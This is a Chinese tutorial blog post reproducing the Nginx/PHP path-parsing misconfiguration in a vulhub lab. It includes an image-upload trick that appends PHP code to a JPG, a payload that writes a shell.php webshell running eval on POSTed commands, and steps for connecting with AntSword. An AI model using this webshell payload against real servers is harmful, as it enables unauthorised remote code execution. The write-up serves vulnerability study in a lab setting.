Nginx解析漏洞(nginx_parsing_vulnerability)

2024-01-28 11:44

本文主要是介绍Nginx解析漏洞(nginx_parsing_vulnerability),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

Nginx解析漏洞   

环境搭建

复现

漏洞利用


Nginx解析漏洞   

        NGINX解析漏洞主要是由于NGINX配置文件以及PHP配置文件的错误配置导致的。这个漏洞与NGINX、PHP版本无关,属于用户配置不当造成的解析漏洞。具体来说,由于nginx.conf的配置导致nginx把以’.php’结尾的文件交给fastcgi处理,对于任意文件名,在后面添加/xxx.php(xxx为任意字符)后,即可将文件作为php解析。

        当攻击者访问/phpinfo.jpg/abc.php时,Nginx将查看URL,看到他以.php结尾,并将路径传递给php fastcgi处理程序,php看到/phpinfo.jpg/abc.php不存在,便删除去最后的/abc.php,看到phpinfo.jpg存在,而后以php的形式执行.jpg的内容。

        这里涉及到php的有一个选择:cgi.fix_pathinfo,该配置默认为1,开启状态,表示对文件路径进行“修理”。当php遇到文件路径“/1.aaa/2.bbb/3.cccc"文件时,若“/1.aaa/2.bbb/3.cccc"不存在,则会去掉最后的”/3.ccc",然后判断“/1.aaa/2.bbb”是否存在,若不存在,则继续去掉“/2.bbb”,以此类推。

环境搭建

打开vulhub靶场,nginx解析漏洞的地址时  /vulhub-master/nginx/nginx_parsing_vulnerability

vulhub靶场包的下载地址:github.com/vulhub

vulhub靶场的搭建教程可以参考:kali linux 下搭建 Vulhub 靶场(图文详解)

vulhub依赖于docker运行,所以记得安装docker

复现

下面是vulhub中关于nginx解析漏洞的readme:

        版本信息:

                        Nginx 1.x 最新版

                        PHP 7.x最新版

        由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。

访问 localhost /uploadfiles/nginx.png    则 正常显示

增加  /.php 后缀,则解析为php文件

漏洞利用1

上面已经确定niginx解析漏洞存在, 我们可以通过文件上传利用nginx解析漏洞获取shell

首先,找一个jpg格式的图片,上传,上传时使用burp suite抓包(建议使用bp的内置浏览器)

​​​​​​​

        这里我们上传上面的jpg格式的图片,提交前进行抓包,图片中的位置添加

                                <?php echo phpinfo(); ?>

        可以看到这里上传成功,该图片的位置如下

 

        我们利用nginx解析漏洞,添加/.php的后缀,可以看到phpinfo执行成功

 漏洞利用2

        还是用漏洞利用1 中的图片 ,不过我们在上传时,抓包后在图片末的位置添加的内容为

                <?php fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);echo"hacker"?>');?>

        访问上传位置,添加/.php的后缀,再访问   若uploadfiles下出现shell.php的文件 ,则说明百分之99以及成功

        使用中国蚁剑进行连接

        这里可以看到,连接成功 

总结 

        该漏洞与nginx、php版本无关,属于用户配置不当造成的解析漏洞

这篇关于Nginx解析漏洞(nginx_parsing_vulnerability)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/653544

相关文章

网页解析 lxml 库--实战

lxml库使用流程 lxml 是 Python 的第三方解析库,完全使用 Python 语言编写,它对 XPath表达式提供了良好的支 持,因此能够了高效地解析 HTML/XML 文档。本节讲解如何通过 lxml 库解析 HTML 文档。 pip install lxml lxm| 库提供了一个 etree 模块,该模块专门用来解析 HTML/XML 文档,下面来介绍一下 lxml 库

【C++】_list常用方法解析及模拟实现

相信自己的力量,只要对自己始终保持信心,尽自己最大努力去完成任何事,就算事情最终结果是失败了,努力了也不留遗憾。💓💓💓 目录   ✨说在前面 🍋知识点一:什么是list? •🌰1.list的定义 •🌰2.list的基本特性 •🌰3.常用接口介绍 🍋知识点二:list常用接口 •🌰1.默认成员函数 🔥构造函数(⭐) 🔥析构函数 •🌰2.list对象

OWASP十大安全漏洞解析

OWASP(开放式Web应用程序安全项目)发布的“十大安全漏洞”列表是Web应用程序安全领域的权威指南,它总结了Web应用程序中最常见、最危险的安全隐患。以下是对OWASP十大安全漏洞的详细解析: 1. 注入漏洞(Injection) 描述:攻击者通过在应用程序的输入数据中插入恶意代码,从而控制应用程序的行为。常见的注入类型包括SQL注入、OS命令注入、LDAP注入等。 影响:可能导致数据泄

从状态管理到性能优化:全面解析 Android Compose

文章目录 引言一、Android Compose基本概念1.1 什么是Android Compose?1.2 Compose的优势1.3 如何在项目中使用Compose 二、Compose中的状态管理2.1 状态管理的重要性2.2 Compose中的状态和数据流2.3 使用State和MutableState处理状态2.4 通过ViewModel进行状态管理 三、Compose中的列表和滚动

Spring 源码解读:自定义实现Bean定义的注册与解析

引言 在Spring框架中,Bean的注册与解析是整个依赖注入流程的核心步骤。通过Bean定义,Spring容器知道如何创建、配置和管理每个Bean实例。本篇文章将通过实现一个简化版的Bean定义注册与解析机制,帮助你理解Spring框架背后的设计逻辑。我们还将对比Spring中的BeanDefinition和BeanDefinitionRegistry,以全面掌握Bean注册和解析的核心原理。

CSP 2023 提高级第一轮 CSP-S 2023初试题 完善程序第二题解析 未完

一、题目阅读 (最大值之和)给定整数序列 a0,⋯,an−1,求该序列所有非空连续子序列的最大值之和。上述参数满足 1≤n≤105 和 1≤ai≤108。 一个序列的非空连续子序列可以用两个下标 ll 和 rr(其中0≤l≤r<n0≤l≤r<n)表示,对应的序列为 al,al+1,⋯,ar​。两个非空连续子序列不同,当且仅当下标不同。 例如,当原序列为 [1,2,1,2] 时,要计算子序列 [

多线程解析报表

假如有这样一个需求,当我们需要解析一个Excel里多个sheet的数据时,可以考虑使用多线程,每个线程解析一个sheet里的数据,等到所有的sheet都解析完之后,程序需要提示解析完成。 Way1 join import java.time.LocalTime;public class Main {public static void main(String[] args) thro

ZooKeeper 中的 Curator 框架解析

Apache ZooKeeper 是一个为分布式应用提供一致性服务的软件。它提供了诸如配置管理、分布式同步、组服务等功能。在使用 ZooKeeper 时,Curator 是一个非常流行的客户端库,它简化了 ZooKeeper 的使用,提供了高级的抽象和丰富的工具。本文将详细介绍 Curator 框架,包括它的设计哲学、核心组件以及如何使用 Curator 来简化 ZooKeeper 的操作。 1

Windows下Nginx的安装及开机启动

1、将nginx-1.16.1.zip解压拷贝至D:\web\nginx目录下。 2、启动Nginx,两种方法: (1)直接双击nginx.exe,双击后一个黑色的弹窗一闪而过。 (2)打开cmd命令窗口,切换到nginx目录下,输入命令 nginx.exe 或者 start nginx ,回车即可。 3、检查nginx是否启动成功。 直接在浏览器地址栏输入网址 http://lo

nginx介绍及常用功能

什么是nginx nginx跟Apache一样,是一个web服务器(网站服务器),通过HTTP协议提供各种网络服务。 Apache:重量级的,不支持高并发的服务器。在Apache上运行数以万计的并发访问,会导致服务器消耗大量内存。操作系统对其进行进程或线程间的切换也消耗了大量的CPU资源,导致HTTP请求的平均响应速度降低。这些都决定了Apache不可能成为高性能WEB服务器  nginx: